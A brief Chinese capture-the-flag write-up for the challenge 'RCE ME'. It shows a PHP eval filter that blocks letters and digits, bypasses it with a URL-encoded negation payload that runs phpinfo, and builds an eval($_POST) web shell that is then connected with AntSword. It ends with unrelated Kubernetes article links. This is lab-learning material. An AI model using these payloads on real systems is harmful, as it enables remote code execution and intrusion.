[极客大挑战 2019]RCE ME
本文共 632 字,大约阅读时间需要 2 分钟。
- 题目源码
40){ die("This is too Long."); } if(preg_match("/[A-Za-z0-9]+/",$code)){ die("NO."); } @eval($code);}else{ highlight_file(__FILE__);}// ?> - 无字母无数字的绕过
- 新知识PHP的URL编码取反绕过
- 尝试
- 结果:
%8F%97%8F%96%91%99%90 - payload:
?code=(~%8F%97%8F%96%91%99%90)(); - 就可以看见phpinfo()的信息了(禁用了很多的函数) 原理我不太懂…
- 同样的道理尝试去写个一句话木马进去
";$c='(eval($_POST[a]))';$d=urlencode(~$c);echo $d; ?>
- 运行结果 get传参 蚁剑连接 起初readflag无法利用 运用插件解决掉~
转载地址:http://gfwmf.baihongyu.com/
你可能感兴趣的文章
记一次 Kubernetes 机器内核问题排查
查看>>
记一次 Kubernetes 中严重的安全问题
查看>>
在业务系统中寻找技术含量
查看>>
拥抱云原生,基于 eBPF 技术实现 Serverless 节点访问 K8S Service
查看>>
有了 Docker 就不用再深入学习 MySQL 了?
查看>>
持续监控集群中的镜像漏洞
查看>>
终于可以像使用 Docker 一样丝滑地使用 Containerd 了!
查看>>
张磊大神的《深入剖析Kubernetes》终于出书啦!
查看>>
KubeSphere 团队(青云QingCloud) 全职开源职位等你加入!
查看>>
真棒!3 种方法限制 Pod 磁盘容量,瞬间豁然开朗
查看>>
高并发、高可用、高可靠微服务架构7大顶级设计思维模型
查看>>
如何使用 registry 存储的特性
查看>>
凉了,stress 无论如何也无法打满 CPU
查看>>
除了 k8s,留给 k 和 s 中间的数字不多了!
查看>>
使用 wrk 压测并精细控制并发请求量
查看>>
Ceph 故障排查笔记 | 万字经验总结
查看>>
使用 Go 从零开始实现 CNI 可还行?
查看>>
KubeSphere 3.1.0 GA:混合多云走向边缘,让应用无处不在
查看>>
Containerd 1.5 发布:重磅支持 docker-compose!
查看>>
基于 Kubernetes 的 Spring Could 微服务 CI/CD 实践
查看>>